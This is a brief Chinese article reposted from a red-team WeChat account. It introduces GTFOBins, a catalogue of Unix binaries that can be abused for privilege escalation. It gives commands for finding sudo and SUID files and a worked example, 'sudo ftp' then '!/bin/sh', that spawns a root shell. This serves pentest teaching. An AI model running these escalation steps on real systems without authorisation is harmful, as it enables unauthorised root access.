0-简介
GTFOBins 是精选的 Unix 二进制文件列表,可用于绕过系统中错误配置,突破本地安全限制,进行权限提升
覆盖390多个可提权文件
该项目收集了可以被滥用的 Unix 二进制文件的合法函数,用于突破受限的 shell、提升或维持提升的权限、传输文件、生成绑定和反向 shell,以及促进其他后期利用任务
1-名称
GTFOBins2-来源
https://gtfobins.github.io/3-用法
在linux的shell下查看sudo 及 suid 文件使用如下命令:
sudo -lfind / -perm -u=s -type f 2>/dev/null
将得到的文件列表,在https://gtfobins.github.io/中查找,查到结果可以使用相关提权命令进行提权
4-技巧
查找sudo或suid文件:
sudo -lfind / -perm -u=s -type f 2>/dev/null
查找提权方式:
比如发现sudo文件ftp
https://gtfobins.github.io/#ftp
点击ftp后面的sudo标签
https://gtfobins.github.io/gtfobins/ftp/#sudo
提权命令如下:
sudo ftp!/bin/sh
执行后提权成功
原文始发于微信公众号(高级红队专家):黑客武器库 | Linux提权神器GTFOBins
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论